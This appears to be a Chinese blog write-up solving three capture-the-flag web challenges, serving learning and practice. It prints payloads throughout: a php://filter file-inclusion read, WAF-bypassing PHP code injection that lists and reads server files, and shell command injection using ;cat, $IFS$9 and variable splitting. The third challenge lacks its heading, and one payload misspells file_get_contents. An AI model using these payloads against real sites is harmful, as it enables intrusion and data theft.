一、[极客大挑战 2019]Secret File

打开环境，审查网页源码，发现隐藏的链接

在这里插入图片描述

点击超链接，提示信息可能被忽略了

在这里插入图片描述
使用Burp抓包，点击SECRET，审查源码

在这里插入图片描述
访问secr3t.php

代码审计，这是文件包含，将file赋值为flag.php，访问然而并没有内容

但其实已经得到了内容

在这里插入图片描述
考虑使用PHP伪协议过滤器filter再次访问

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述
得到base64加密信息，解码即可获得FLAG

在这里插入图片描述

二、[RoarCTF 2019]Easy Calc

审查源码，发现超链接，并提示有WAF
在这里插入图片描述
访问查看源码

在这里插入图片描述
在❓后添加空格，尝试包含phpinfo()成功,绕过WAF

calc.php/? num=phpinfo();

在这里插入图片描述
代码审计可知，过滤斜杠，所以使用chr函数代替明文斜杠，即chr(47)

可以使用var_dump和scandir获取目录信息

calc.php? num=1;var_dump(scandir(chr(47)))

在这里插入图片描述
使用file_get_content访问flagg并且使用.拼接变量，得到FLAG

calc.php? num=1;var_dump(file_get_content(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

提示需要使用GET命令拼接IP

顺便把ls命令也拼接上
在这里插入图片描述
（访问index.php可以看到源码）

cat访问flag.php，发现空格被过滤

/?ip=127.0.0.1;cat flag.php;

！！别忘了末尾的分号！！

在这里插入图片描述
绕过空格过滤发现，符号也被过滤了，只能使用$IFS$9代替空格

然而flag也被过滤了

/?ip=127.0.0.1;cat$IFS$9flag.php;

在这里插入图片描述
设置变量a绕过字符串过滤，在注释里发现FLAG

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php;

在这里插入图片描述

欢迎在评论区留言
感谢浏览